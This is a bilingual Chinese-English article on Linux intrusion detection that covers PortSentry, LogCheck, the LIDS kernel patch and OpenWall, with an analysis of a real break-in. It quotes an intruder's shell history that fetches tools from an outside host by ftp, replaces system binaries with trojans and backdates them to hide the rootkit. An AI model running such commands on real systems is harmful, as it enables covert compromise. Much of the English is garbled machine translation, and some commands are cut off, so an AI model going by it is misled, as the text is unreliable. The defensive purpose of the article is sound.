Linux Intrusion Detection

作者David "Del" Elson By David "Del" Elson
最近更新2000年5月22日翻译■／Luther Last updated May 22, 2000 translated ■ / Luther

简介这篇文章主要是关于适用于Linux的几种基于主机的入侵检测系统。 Introduction This article is about a few for Linux host-based intrusion detection system. 特别的，我们将会覆盖一些怎么安装这些软件包的要素，已经它们的用处和什么时候能够用到这些东西。 In particular, we will cover some of the elements of how to install these packages have their usefulness and when to use these things.

系统安全101 System Safety 101
本文将为大家展示一些基础的系统安全知识。 This article will show you some basic knowledge of system security. 特别的，我假设很多常见的安全措施已经被用来抵抗来自Internet对主机的入侵。 In particular, I assume a lot of common security measures have been used to resist the invasion of the host from the Internet. 这些安全措施主要是：防火墙，确定了系统的来自Internet的用户对哪些TCP或者UDP端口有访问的权限。 These security measures are mainly: a firewall, to determine the system's users from the Internet TCP or UDP ports which have access permissions. 例如：我们通过一些很简单的Web Server防火墙的规则设置，就可以确定这台机器只有用来提供http服务的80端口向用户开放。 For example: we some very simple rules for Web Server firewall settings, can only be used to determine the machine's port 80 http service provided to users.

系统是不需要没有用处的守护进程的。 System is not useless daemon. 例如：一个Web服务器一般只需要一个正在运行的进程来服务Web页面。 For example: a Web server generally requires a running process to serve Web pages. 进程并不是就是和服务与Web页面相关联的，譬如RPC/Portmap服务，NFS服务，X Font服务，DNS域名服务，其他外来的或者是没有什么用处的应用软件应该被关掉或者是禁用。 Processes and services is not associated with the Web page, such as RPC / Portmap service, NFS service, X Font Service, DNS Domain Name Service, or other outside is of little use applications should be turned off or disabled. 在Red Hat Linux的系统中，通常我们用一种运行等级的编辑器来进行有关的设置，譬如我们可以用ntsysv 或者tksysv来禁用其中的那些没有要求的守护进程。 In Red Hat Linux systems, we usually run with a level editor for the settings, for example, we can use ntsysv or tksysv to disable one of the daemons that are not required.

通过编辑和修改/etc/inetd.conf可以屏蔽一些不用的端口。 By editing and modifying / etc / inetd.conf can mask some of the unused ports. 作为一个典型的默认值，我们安装一个新的Linux系统的时候，/etc/inetd.conf默认的打开了很多端口。 As a typical default value, we installed a new Linux system, when, / etc / inetd.conf by default a lot of open ports. 所有的系统都应该通过编辑/etc/inetd.conf，删除或者是注释掉其中的一些行，用来禁用那些没有用处的端口，这是最基本的系统安全行为。 All systems should be by editing the / etc / inetd.conf, remove or comment out some lines, used to disable those useless ports, which is the most basic system security behavior. 警戒线（Lines of Defense）： Cordon (Lines of Defense):

一、多层系统安全这一部分，我们将讨论一个多层通道的系统安全问题。 A multi-layer security in this section, we will discuss a multi-channel system security issues. 当其中一些安全层被破坏的时候，很多安全层能够独立的应用来提供一些额外的防卫。 When some of the security layer is damaged, many layers of security to be independent of the application to provide additional defense. 图1就是一种多层结构的系统安全模型。 Figure 1 is a multi-layer structure of the system security model.
图表中的每一层都会为自己的上一层提供额外的数据保护。 Each layer of the chart will provide for their own extra layer of data protection. 例如：第一层是防火墙，如果防火墙没有阻挡住外界的入侵尝试，那么第二层-端口守护程序就会提供额外的保护。 For example: the first layer is a firewall, if you live outside of the firewall is not blocking intrusion attempts, then the second layer - the port the daemon will provide additional protection. 进一步，里面的安全系统是LIDS和LogCheck程序，在入侵尝试没有被第二层截获的时候也会进行保护。 Further, there is a security system and LogCheck LIDS program, the invasion attempt was not intercepted when the second layer will be protected.

监控当前连接防火墙后的第一防护层是用来监控当前与主机的连接尝试的软件包。 Monitor the current connection after the first protective layer firewall is used to monitor the current connection to the host attempts to package. 端口守护程序包（http://www.psionic.com/abacus/portsentry/ ）提供了一些简洁和有用方式来完成这些事情。 Port daemon package (http://www.psionic.com/abacus/portsentry/) offers some simple and useful way to accomplish these things.

端口守护（PortSentry）程序的作用端口守护程序的主要作用监控一些特殊的TCP/IP端口的活动情况。 Port Guardian (PortSentry) the role of the program's main function port monitor daemon some special TCP / IP port's activities. PortSentry监视并报告一些端口的活动，其中的一种情况可能被选中，包括拒绝进一步的连接尝试。 PortSentry monitor and report on the activities of a number of ports, one of them may be selected, including refusing further connection attempts. 这是一种很重要的防护措施，因为一般的黑客在入侵一个系统之前都会将会使用一些工具来探测系统的漏洞和弱点。 This is a very important protective measure, because most hackers before the invasion will be a system to use some tools to detect system vulnerabilities and weaknesses. 察觉到探测器或者是端口扫描，就可以彻底的切断一些潜在地黑客进一步的连接尝试，中止一些带有入侵意图的进一步的端口扫描。 Aware of the probe or port scan, you can completely cut off some of the hackers potentially further connection attempts, stop the invasion with the intent to further some of the port scan.

安装PortSentry Installation PortSentry
对于Red Hat的用户来说，Red Hat的ftp服务器上的RPM包里面包含了这个程序。 For users of Red Hat, Red Hat's RPM packages on the ftp server which contains the program. 这个站点在全球都有它的镜像，你可以在www.redhat.com上面查找距离你最近的站点。 This site has its image in the world, you can find your nearest www.redhat.com above site. 我还不能确定.deb格式的软件包中间是PortSentry这样的程序，但是我可以确认那里肯定是有这个软件的。 I'm not sure. Deb package format, so the middle is PortSentry program, but I can confirm that there definitely have this software. 对于其他Linux用户来说，通过原码来安装这个软件也是相当地简单的。 For other Linux users, through the original code to install this software is fairly simple.

推荐配置 Recommended
PortSentry有很多运行模式，包括不同的UDP和TCP秘密运行的模式。 PortSentry many operating modes, including the UDP and TCP in different secret operation mode. 我选择的运行机制是把PortSentry绑定在那些没有被使用的或者是认为有潜在的入侵可能的TCP端口上。 I chose the operating mechanism is to bind those PortSentry not used or is that a potential invasion of possible TCP port. 例如：我将24小时连续的扫描我的web服务器上面的这些端口，port 143 (imap2), port 111 (portmap) 和port 23 (telnet)都是我的Internet系统上没有使用的TCP端口。 For example: I will be 24 hours of continuous scanning my web server above these ports, port 143 (imap2), port 111 (portmap) and port 23 (telnet) on all my systems do not use the Internet TCP port. 你可以通过这条命令： You can use this command:
portsentry -tcp portsentry-tcp
在你的系统启动的时候就使PortSentry进入基本的TCP运行模式。 In your system startup when the PortSentry into the basic TCP operation mode. 同时要保证PortSentry的配置文件portsentry.conf中包含了TCP_PORTS这行配置来扫描你需要进行扫描的端口。 At the same time to ensure that the configuration file portsentry.conf PortSentry contains TCP_PORTS configured to scan line to scan the ports you need.
反应选项你能通过portsentry.conf中的"Response Options"部分来详细的说明什么样的反应是PortSentry察觉了一些不期望的连接。 Response options for you through portsentry.conf in the "Response Options" section to explain in detail what kind of reaction is not expected PortSentry aware of some connection. 通常我会使用ipchains来中断那些来自于连接的源方的进一步连接。 I usually use ipchains to interrupt those from the source side connected, further connection. 这个也可以通过portsentry.conf中下面这样一行来进行配置：KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY -l"在接受来自高端口的扫描行为的时候，可以通过删除上面一行中的-l这个选项来屏蔽这些进一步的连接，可以有效的维持系统日志空间。 This can also be portsentry.conf in line to be configured like this: KILL_ROUTE = "/ sbin / ipchains-I input-s $ TARGET $-j DENY-l" in an act from a high port scan time can be remove the top row of the-l option to block them further in this connection, can effectively maintain the system log space.
监视系统日志诸如防火墙系统、PortSentry这样的软件可以有效的监视或者是屏蔽一些端口的不期望的连接。 Monitoring system logs such as firewall systems, PortSentry such software can effectively monitor or block some ports do not expect the connection. 这样可以防止最典型的那种"扫描－入侵"的攻击方式。 This prevents the most typical kind of "scan - invasion" of the attack. 当系统需要运行特殊的服务（例如：Apache Web Server，或者是绑定了一个DNS服务）的时候，同时有黑客破解了这种服务中的一些攻击点，这些程序就会很不幸运的不能保持把所有的入侵者拒之门外。 When the system needs to run special services (eg: Apache Web Server, or the binding of a DNS service), when, while hacking some of this service point of attack, these programs will be very lucky not to keep shut out all intruders. 绑定运行着一个容易受攻击的程序的DNS服务器，这些端口最终总是要被一些黑客通过扫描很广范围的机器的特定的一个端口，并且会试图通过这个端口来入侵系统。 Binding running a vulnerable DNS server program, these ports will eventually have to be some of the hackers by scanning a wide range of machine-specific port, and will try to invade the system through this port. 很不幸，防火墙或者是PortSentry程序会将这些入侵尝试当作正常的合理的连接。 Unfortunately, firewalls or intrusion PortSentry program will try these as normal and reasonable connection.
系统日志检测（LogCheck） System log test (LogCheck)
LogCheck是用来扫描系统日志文件的软件（http://www.psionic.com/abacus/logcheck/ ）。 LogCheck log file is used to scan the system software (http://www.psionic.com/abacus/logcheck/). LogCheck会扫描系统日志文件（在Linux系统中，系统日志文件在/var/log/目录下面），同时当系统出现一些异常的时候，LogCheck就会通过Email来通报给管理员。 LogCheck scans the system log file (in the Linux system, the system log file in / var / log / directory), while when the system when some abnormality, LogCheck to be notified by Email to the administrator. 系统日志文件中的异常的消息通常是表示有一些黑客正在尝试入侵或者是正在侵入系统。 Anomalies in the system log file the message is often said that some hackers are trying to invade or are invasive system.
安装LogCheck Installation LogCheck
LogCheck有四个主要的配置文件。 LogCheck There are four main configuration files. 在RPM版本中，这几个配置文件在/etc/logcheck目录下面。 In the RPM version, these configuration files in / etc / logcheck directory. 通常我们只需要配置logcheck.ignore和logcheck.violations.ignore这两个文件。 Usually we only need to configure logcheck.ignore and logcheck.violations.ignore these two files. 我在安装完LogCheck后的程序一般是这样的：允许LogCheck在正常的运行模式下面运行一次，这样将会一个巨大的输出文件，不过我们可以把这个文件删除算了。 After I installed the program LogCheck general is this: allow LogCheck below the normal operating mode to run again, this will be a huge output file, but we can forget to delete this file. 24小时以后让LogCheck再次运行一次，这次我们会在日志文件的入口处中发现产生了一些新的东西，同时也是一个很大的但是仍然可以计算大小的文件。 Again 24 hours later to LogCheck run again, this time we will find the entrance to the log file created something new, but also a large but still can calculate the size of the file. 仔细的阅读这个文件。 Carefully read this document.
在文件的入口处有一些不需要我们关心的特定的字符串，如果这些字符串时一些"违反安全"的片断，我们可以将这些字符串片断加入到 logcheck.violations.ignore文件中；或者当他们是"异常系统事件"的时候，我们就将这些字符串加到 logcheck.ignore中。 In the paper we are concerned about the entrance there are no specific string, if string a number of "security breach" of the piece, we can add these strings to logcheck.violations.ignore file fragments; or when they is "unusual system events", we will add logcheck.ignore in these strings. 在折椅歌星期中，每隔12~24小时就重复一下这些步骤。 In folding chairs singer period, every 12 to 24 hours on repeat these steps. 在这个阶段中，我们反复的设置.ignore文件的过滤规则，最后剩下的就是我们的系统真正关心的了。 At this stage, we repeated the set. Ignore file filtering rules, what is left is what we really care about the system.
注意到RPM文件指定LogCheck每小时运行一次，但是我只需要每天运行一次，除非是在特定的需要监视的系统。 Note RPM file specifies LogCheck run every hour, but I just need to run once a day, except in particular need to monitor the system. 这样可以每天把/etc/cron.hourly/logcheck这个文件拷贝到/etc/cron中一次。 This day the / etc / cron.hourly / logcheck copy this file to / etc / cron in time.

基于内核的入侵检测基于内核的入侵检测是一种相当巧妙的新型的Linux入侵检测系统。 Kernel-based intrusion detection kernel-based intrusion detection is a very clever new Linux Intrusion Detection System. 现在最主要的基于内核的入侵检测系统叫做LIDS，并可以从http://www.lids.org/ 下载。 Now the main kernel based intrusion detection system called LIDS, and can be downloaded from the http://www.lids.org/.

什么是LIDS？ What is LIDS?
LIDS是一种基于Linux内核的入侵检测和预防系统。 LIDS is a kernel of a Linux-based intrusion detection and prevention systems.
LIDS的保护目的是防止超级用户root的篡改系统重要部分的。 LIDS protection to prevent tampering with the system super-user root, the important part. LIDS主要的特点是提高系统的安全性，防止直接的端口连接或者是存储器连接，防止原始磁碟的使用，同时还要保护系统日志文件。 LIDS main features is to improve the security of the system to prevent a direct connection port or memory, to prevent the use of the original disk, but also protect the system log file. LIDS当然也会适当制止一些特定的系统操作，譬如：安装sniffer、修改防火墙的配置文件。 LIDS will certainly appropriate to stop some of the specific system operations, such as: installing sniffer, modify the firewall configuration file.

LIDS文档工程 LIDS Documentation Project
LIDS比安装PortSentry和LogCheck要复杂一点，但是很幸运的是，在LIDS的主页上面有详细的安装和配置手册。 LIDS PortSentry and LogCheck than installing a little more complicated, but fortunately, in the home above LIDS detailed installation and configuration instructions.
安装LIDS Installing LIDS
首先，在安装之前，我们需要大部分最新的LIDS软件包（我使用的是0.9）和适当的内核版本。 First, install, we need to LIDS most recent package (I'm using 0.9) and the appropriate kernel version. 我现在使用的是从Red Hat主页上下载的2.2.14-12版本的内核，因为其中包含一些安全补丁。 I am using Red Hat home page to download from the 2.2.14-12 kernel, because it contains a number of security patches. 同时你也需要你使用的内核的一些源代码。 You also need the kernel to use some of your source code. 现在的LIDS主要是适用于2.2.14版本的内核。 LIDS is mainly applicable to the present version of the kernel in 2.2.14. 我安装的在2.2.14的内核的Red Hat Linu I installed the 2.2.14 kernel of Red Hat Linu
x6.2上面安装了LIDS。 x6.2 above installed LIDS. 在安装LIDS之前，我在ftp.redhat.com下载了最新的内核版本，并且依照http://www.redhat.com/support/docs/howto/kernel-upgrade/kernel-upgrade.html 安装了这个内核。 Before installing LIDS, I ftp.redhat.com download the latest version of the kernel and this kernel is installed in accordance with http://www.redhat.com/support/docs/howto/kernel-upgrade/kernel-upgrade.html .

接着的事情就是升级内核源代码。 Next thing is to upgrade the kernel source code. 这里我们是这样做的： Here we are doing:
rpm -Uhv kernel-source-2.2.14-12.i386.rpm rpm-Uhv kernel-source-2.2.14-12.i386.rpm
然后就是编译和安装lidsadm这个程序： Then compile and install lidsadm is the program:
cd /usr/local/src/security/lids-0.9/lidsadm-0.9 cd / usr/local/src/security/lids-0.9/lidsadm-0.9
make make
make install make install
生成一个RipeMD-160口令，这个以后将会在安装进内核的： RipeMD-160 to generate a password, this will be later installed into the kernel:
lidsadm -P lidsadm-P
输入口令是"anypass"，得到秘钥"d502d92bfead11d1ef17887c9db07a78108859e8"。 Password is "anypass", get secret key "d502d92bfead11d1ef17887c9db07a78108859e8". 接着，我把Redhat的配置文件拷贝到我的结构体系中，在/usr/src/linux目录下面： Then I copied the Redhat configuration file to my architecture, in the / usr / src / linux directory:
cd /usr/src/linux/configs/ cd / usr / src / linux / configs /
cp kernel-2.2.12-i686.config .. cp kernel-2.2.12-i686.config ..
下面我们就使用下面的命令来安装LIDS： Here we use the following command to install the LIDS:
cd /usr/src cd / usr / src
patch -p0 同时我们应该注意到Red Hat所提供的内核和Linus发布的标准的2.2.14版本的内核有一些细微的差别，因为其中包含一些修改过的驱动程序。 patch-p0 same time we should note that Red Hat provides the standard kernel and Linus released the 2.2.14 kernel there are some subtle differences, because it contains some of the modified drivers. 同样lids-0.9-2.2.14-redhat.patch文件也是和LIDS发布的标准的lids-0.9-2.2.14.patch有一些细微的差别，不过可能后者并不是特别适合于Red Hat系统。 Similarly lids-0.9-2.2.14-redhat.patch file and LIDS is released standard lids-0.9-2.2.14.patch there are some subtle differences, but the latter may be not particularly suitable for Red Hat systems.
最后，就是配置、编译和安装内核了： Finally, there is the configuration, compile and install the kernel:
cd /usr/src/linux cd / usr / src / linux
make menuconfig make menuconfig
make dep; make clean make dep; make clean
make make
install; make modules; make modules_install install; make modules; make modules_install
下面的脚本展示了在配置内核的过程中我设置的LIDS配置选项： The following script demonstrates the process of configuring the kernel, I set the LIDS configuration options:
[*] Linux Intrusion Detection System support (EXPERIMENTAL) [*] Linux Intrusion Detection System support (EXPERIMENTAL)
--- LIDS features --- LIDS features
[ ] Hang up console when raising a securit alert [] Hang up console when raising a securit alert
[*] Security alert when execing unprotected programs before sealing [*] Security alert when execing unprotected programs before sealing
[ ] Do not execute unprotected programs before sealing LIDS [] Do not execute unprotected programs before sealing LIDS
[*] Enable init children lock feature [*] Enable init children lock feature
[*] Try not to flood logs [*] Try not to flood logs
(60) Authorised time between two identic logs (seconds) (60) Authorised time between two identic logs (seconds)
[*] Allow switching LIDS protections [*] Allow switching LIDS protections
RipeMD-160 encrypted password: d502d92bfead11d1ef17887c9db07a78108859e8 RipeMD-160 encrypted password: d502d92bfead11d1ef17887c9db07a78108859e8
(3) Number of attempts to submit password (3) Number of attempts to submit password
(3) Time to wait after a fail (seconds) (3) Time to wait after a fail (seconds)
[*] Allow remote users to switch LIDS protections [*] Allow remote users to switch LIDS protections
[ ] Allow any program to switch LIDS protections [] Allow any program to switch LIDS protections
[*] Allow reloading config. file [*] Allow reloading config. File
[ ] Hide some known processes [] Hide some known processes
[*] Port Scanner Detector in kernel [*] Port Scanner Detector in kernel
[ ] Send security alerts through network [] Send security alerts through network
--- Special authorizations --- Special authorizations
[ ] Allow some known processes to access /dev/mem (xfree, etc.) [] Allow some known processes to access / dev / mem (xfree, etc.)
[ ] Allow some known processes to access raw disk devices [] Allow some known processes to access raw disk devices
[ ] Allow some known processes to access io ports [] Allow some known processes to access io ports
[ ] Allow some known processes to change routes [] Allow some known processes to change routes
--- Special UPS --- Special UPS
[*] Allow some known processes to unmount devices [*] Allow some known processes to unmount devices
Allowed processes: "/etc/rc.d/init.d/halt;/etc/rc.d/init.d/netfs" Allowed processes: "/ etc / rc.d / init.d / halt; / etc / rc.d / init.d / netfs"
[*] Unmounting capability is inherited [*] Unmounting capability is inherited
[*] Allow some known processes to kill init children [*] Allow some known processes to kill init children
Allowed processes: "/etc/rc.d/init.d/halt" Allowed processes: "/ etc / rc.d / init.d / halt"
[*] Killing capability is inherited [*] Killing capability is inherited
看得出，我没有使用UPS，同时运行的是一个需要能够远程访问的服务器，我就按照上面的文件进行了配置，但是在实际应用过程中，每个人的系统根据环境不一样，会有一些差别。 See, I do not use UPS, also need to be able to run a remote access server, the files I had in accordance with the above configuration, but in the actual application process, each person's system is different depending on the environment, there will be some the difference.
配置LIDS: Configuring LIDS:
有一条特别要引起注意：在你的系统的下一次重启之前就应该配置好LIDS！ There is a particular attention: the next time you reboot the system should be configured before the LIDS! 我们应该使用lidsam来配置LIDS的配置文件/etc/lids.conf，而不能手动的修改。 We should use lidsam LIDS configuration file to configure the / etc / lids.conf, but can not be manually modified. 运行"lidsadm -h"可以获得一些关于如何使用lidsadm这个程序的帮助。 Run "lidsadm-h" can get some information about how to use lidsadm this program help. LIDS提供了很多使用LIDS保护文件的例子，例如： LIDS provides many examples of using LIDS to protect files, such as:
lidsadm -A -r /sbin 这条命令保护/sbin整个目录，并且表示只读。 lidsadm-A-r / sbin protection of this command / sbin entire catalog, and said read-only.
我首先的LIDS配置文件应该是这样的： I first of the LIDS configuration file should look like this:
lidsadm -Z lidsadm-Z
lidsadm -A -r /usr/bin lidsadm-A-r / usr / bin
lidsadm -A -r /bin lidsadm-A-r / bin
lidsadm -A -r /usr/sbin lidsadm-A-r / usr / sbin
lidsadm -A -r /sbin lidsadm-A-r / sbin
lidsadm -A -r /usr/X11R6/bin lidsadm-A-r / usr/X11R6/bin
lidsadm -A -r /etc/rc.d lidsadm-A-r / etc / rc.d
lidsadm -A -r /etc/sysconfig lidsadm-A-r / etc / sysconfig
一旦配置了LIDS的配置文件，就应该修改系统的启动文件保证在系统启动的时候就能运行LIDS，这样就能有效的在内核中启动LIDS的作用。 Once you configure LIDS configuration file, you should modify the system startup files to ensure that the system starts to run when you can LIDS, so the kernel can be effective in the role of start LIDS. 一般我都是把lidsadm加到/etc/rc.d/rc.local的末尾，这样能够保证LIDS的功能不会妨碍系统的其他应用程序的正常启动。 Generally I are lidsadm added / etc / rc.d / rc.local at the end, so to ensure LIDS system function does not prevent other applications start. 下面就是我加在/etc/rc/d/rc.local中用来启动LIDS的脚本： Here is what I added to / etc / rc / d / rc.local to start LIDS in the script:
/sbin/lidsadm -I -- -CAP_SYS_MODULE -CAP_SYS_RAWIO -CAP_SYS_ADMIN \ / Sbin / lidsadm-I --CAP_SYS_MODULE-CAP_SYS_RAWIO-CAP_SYS_ADMIN \
-CAP_SYS_PTRACE -CAP_NET_ADMIN -CAP_LINUX_IMMUTABLE \ -CAP_SYS_PTRACE-CAP_NET_ADMIN-CAP_LINUX_IMMUTABLE \
+INIT_CHILDREN_LOCK + INIT_CHILDREN_LOCK
配置lilo Configuring lilo
我们知道，使用Redhat的RPMS升级系统内核以后需要重新配置lilo.conf来保证编译加载过LIDS的新内核能够正常的启动。 We know that the RPMS using Redhat after upgrading the kernel to re-configure the lilo.conf to ensure that the compiler to load the new kernel to LIDS had a normal start. 在下次重启之后，LIDS将会在系统中运行，不过如果你需要停止LIDS而执行一些系统的任务，就应该按照下面的命令进行： After the next reboot, LIDS will be running in the system, but if you need to stop the LIDS system and perform some tasks, it should be in accordance with the following command:
/sbin/lidsadm -S -- -LIDS或者/sbin/lidsadm -S -- -LIDS_GLOBAL / Sbin / lidsadm-S --LIDS or / sbin / lidsadm-S --LIDS_GLOBAL
你需要提供LIDS的口令，当时在编译内核的时候在内核中加入了RipeMD-160格式。 You need to provide LIDS password, then at compile time, the kernel added RipeMD-160 format.
不知道你是否注意到了，在shutdown的脚本中，很多脚本都不能正常的工作。 Do not know if you noticed, in the shutdown script, many scripts can not work properly. 最终的shutdown脚本/etc/rc.d/init.d/halt将会停止所有的进程和卸载文件系统。 The final shutdown script / etc / rc.d / init.d / halt will stop all the processes and unmount the file system. 由于在文件rc.local中"+INIT_CHILDREN_LOCK"的保护作用，其他的进程都没有权限来杀掉init()的其他子进程。 Since the file rc.local in "+ INIT_CHILDREN_LOCK" protective effect, other processes do not have permission to kill init () of the other sub-processes. 同时每隔10分钟，你就会收到一个关于"rmmod \as"不能卸载模块的出错信息。 At the same time every 10 minutes, you will receive one on "rmmod \ as" can not unload the module error information. 这个主要是由于LIDS启动以后"-CAP_SYS_MODULE"的保护使得模块的插入或者卸载出现了毛病。 This was mainly due to start LIDS after "-CAP_SYS_MODULE" protection makes the module into or unloaded there problems. 我们可以删除/etc/cron.d/kmod这个文件来防止出错信息继续发生。 We can remove the / etc / cron.d / kmod file to prevent this error message continues to occur.

LIDS能够保护什么？ LIDS can protect?
快速的浏览LIDS的文档就可以了解LIDS的一系列特性。 Fast document browsing LIDS LIDS can understand a range of features. 而我认为下面的这些特性是最重要的： And I think the following is the most important of these features:
CAP_LINUX_IMMUTABLE 当文件和外那间系统被标识"immutable"防止被写； CAP_LINUX_IMMUTABLE When the file system and outside it was identified between the "immutable" to prevent being written;
CAP_NET_ADMIN 防止篡改网络配置（例如：防止路由表被修改）； CAP_NET_ADMIN to prevent tampering with the network configuration (for example: to prevent the routing table is modified);
CAP_SYS_MODULE 防止内核模块被插入或者移除； CAP_SYS_MODULE prevent the kernel module is inserted or removed;
CAP_SYS_RAWIO 防止损坏磁盘或者设备I/O； CAP_SYS_RAWIO prevent damage to the disk or device I / O;
CAP_SYS_ADMIN 防止大范围的使用其他系统功能； CAP_SYS_ADMIN prevent the use of a wide range of other system functions;
INIT_CHILDREN_LOCK which prevents child processes of the init() master pro INIT_CHILDREN_LOCK which prevents child processes of the init () master pro
cess from being tampered with. cess from being tampered with.
无论在哪个点，上面这些特性都能够通过命令"lidsadm -I"来启动，通过"lidsadm -S" No matter at which point, the above features are able to command "lidsadm-I" to start, through the "lidsadm-S"
来禁用（可以允许真正的系统管理员来进行系统配置），同时提供已经安装在内核中的LIDS口令（是通过RipeMD-160加密的）。 To disable (allows system administrators to perform a real system configuration), while providing the kernel has been installed in the LIDS password (is encrypted by RipeMD-160).

剖析一次入侵最近我一直忙于检查一些被黑过的机器，来推断一些被入侵的原因还有核实黑客对系统破坏。 Analysis of an invasion lately I've been busy checking some of the hacked machines, to infer some of the reasons for the invasion of hackers there to verify the system damage. 很幸运，一些黑客不是特别的聪明，在入侵一些系统之后没有设法彻底的抹掉痕迹。 Fortunately, some of the hackers is not particularly clever, some systems after the invasion did not manage to completely erase the traces. 当黑客把一些系统守护进程的缓冲区溢出以后就可以获得root权限，这个时候就是主机被入侵了（事实上是不可能发生的，但是安装Linux系统的人忘记了打上RedHat最新的关于缓冲区溢出的补丁程序，并且让系统一直运行着）。 When the hackers some system daemon buffer overflow can get root access after this time is that the host has been compromised (in fact, can not happen, but people who install Linux RedHat forgot marked the latest on buffer overflow patch, and let the system has been running). 当然一些黑客也不够小心，当他们侵入主机后，很急切的获得了shell，但是他们经常没有考虑到BASH的命令将会被存入系统日志文件中，简单的阅读/.bash_history就可以了解黑客到底怎么机器上面作了一些什么事情。 Of course, some hackers are not careful, when they invade the host, it was very eager to get a shell, but they often do not take into account the BASH command will be stored in the system log file, a simple read /. Bash_history can understand hackers in the end how some of what made the machine above. 这个文件我们可以看看（为了更加简单我们做过一些细微的修改）： We can look at this file (for more simple and we did some minor modifications):

mkdir /usr/lib/... ; cd /usr/lib/... mkdir / usr / lib / ...; cd / usr / lib / ...
ftp 200.192.58.201 21 ftp 200.192.58.201 21
cd /usr/lib/... cd / usr / lib / ...
mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz; mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz;
mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz; mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz;
mv tcpd.gz? tcpd.gz mv tcpd.gz? tcpd.gz
gzip -d * gzip-d *
chmod +x * chmod + x *
mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin; mv netstat / bin; mv ps / bin; mv tcpd / usr / sbin /; mv syslogd / usr / sbin;
mv pt07 /usr/lib/; mv pstree /usr/bin ; mv pt07 / usr / lib /; mv pstree / usr / bin;
/usr/lib/pt07 / Usr/lib/pt07
touch -t 199910122110 /usr/lib/pt07 touch-t 199910122110 / usr/lib/pt07
touch -t 199910122110 /usr/sbin/syslogd touch-t 199910122110 / usr / sbin / syslogd
touch -t 199910122110 /usr/sbin/tcpd touch-t 199910122110 / usr / sbin / tcpd
touch -t 199910122110 /bin/ps touch-t 199910122110 / bin / ps
touch -t 199910122110 /bin/netstat touch-t 199910122110 / bin / netstat
touch -t 199910122110 /usr/bin/pstree touch-t 199910122110 / usr / bin / pstree
cat /etc/inetd.conf | grep -v 15678 >> /tmp/b cat / etc / inetd.conf | grep-v 15678>> / tmp / b
mv /tmp/b /etc/inetd.conf mv / tmp / b / etc / inetd.conf
killall -HUP inetd killall-HUP inetd
通读这些内容，我们就可以了解下面的一些动作： Read through these, we can understand some of the following actions:
系统中建立了一个名字异常的目录（/usr/lib），接着黑客telnet到了自己的主机上面（200.192.58.201，是Brazil某个地方的拨号用户），同时下载了一套黑客工具。 System created a directory name exception (/ usr / lib), then the hacker to telnet to the top of their host (200.192.58.201, is Brazil a local dial-up users), and download a hacking tool. 这些黑客工具尸没有经过压缩的，中间的一些特洛伊二进制程序被安装到了系统中了，这些特洛亦程序覆盖了系统的netstat，ps， tcpd， syslogd和pstree命令。 These hacking tools corpse is not compressed, the middle of some of the Trojan binaries are installed into the system, these Trojan programs also cover the system netstat, ps, tcpd, syslogd, and pstree command. 这些程序是用来报告系统有那些进程正在运行，那些端口是打开的。 These procedures are used to report system which processes are running, that port is open.

我们从中能学到什么呢？ What we can learn from it?
首先，LIDS是不能阻止一次入侵的，黑客连接上主机通过缓冲区溢出的方式获得系统的root权限。 First, LIDS can not stop an invasion, a hacker to connect hosts on the way to get through a buffer overflow system root privileges.
一旦系统没有黑客入侵，我们看看LIDS是如何使破坏降到最低的： Once the system is not hacked, we look at how to make LIDS minimize damage:
LIDS通过CAP_LINUX_IMMUTABLE选项可以防止特洛亦程序被写入到/bin，/usr/bin， /usr/sbin和/usr/lib目录中。 LIDS by CAP_LINUX_IMMUTABLE option also prevents the Trojan program is written to the / bin, / usr / bin, / usr / sbin and / usr / lib directory. 这些目录我们一般都会标识为不可变的（chattr +i），因而也不会被修改。 We generally identify these directories as immutable (chattr + i), and thus will not be modified. 我们可以注意到，就算不使用LIDS，也可以通过chattr +I命令来标识目录为不可变的，但是如果是通过LIDS以后，即使是root也不能篡改不可变标识位。 We can note that, even without LIDS, can also chattr + I command to identify the directory is not changed, but if by LIDS later, even root can not be tampered with immutable identifier bits. 类似的，如果文件通过chattr +I被标识为，touck -t这个命令也会失败。 Similarly, if the file is identified by the chattr + I to, touck-t This command will fail. 甚至第一行的"mkdir /etc/lib"这个命令也会失败，如果我们标识文件为不可读的话。 Even the first line of "mkdir / etc / lib" This command will fail, if we identify the file as unreadable words. LIDS不能防止黑客入侵，但是可以防止入侵的黑客在侵入后进行很大的系统破坏。 LIDS can not prevent hackers, but hackers can prevent the invasion after the invasion of a large system damage. 一个后门程序可以被安装上系统，但是没有特洛亦版本的ps，netstat和pstree能够很早的发现这个后门进程，然后kill之。 A backdoor that can be installed on the system, but there is no version of Troy also ps, netstat, and pstree to find the back door early in the process, then kill it. 如果没有LIDS，我们不可能知道黑客通过这个后门程序会做一些什么事情，我们唯一能够进行挽回的工作就是重装系统。 If you do not LIDS, we can not know through this backdoor hackers will do anything we can to save the only job is to reinstall the system.

OpenWall和LIDS：额外的层另外一个和LIDS相似的系统是OpenWall工程（http://www.openwall.com/linux/ ）。 OpenWall and LIDS: an additional layer of another similar system and LIDS OpenWall Engineering (http://www.openwall.com/linux/). OpenWall工程在很多地方和LIDS不一样，有一个OpenWall的特别的补丁就是使栈区为不可执行。 OpenWall works in many places and LIDS is not the same, there is a special OpenWall patch is to make the area as non-executable stack. 下面是摘自OpenWall的README文档里面的申明：大多数缓冲区溢出攻击都是基于覆盖一些随意的程序片段中的函数返回值在堆栈中的地址，如果堆栈为不可执行，那么缓冲区溢出的弱点将会变得很难攻击。 The following is an excerpt from the README file inside OpenWall stated: Most buffer overflow attacks are based on the coverage of some random snippets of the function return value in the address of the stack, if the stack is not executable, then the buffer overflow vulnerability will will become very difficult to attack. 另外一种缓冲区溢出的方式是在libc中指出一个函数的返回地址，通常是system()。 Another way is to buffer overflow in libc that a function's return address, usually the system (). 这个补丁通过修改mmap()化的共享库，使其总是一个零字节的文件。 This patch by modifying the mmap () of the shared library, it is always a zero-byte file. 这样使其不能再指定一些数据，在很多攻击中不得不使用ASCIIZ字符串。 So that it can no longer specify some data, in many attacks have to use ASCIIZ string. 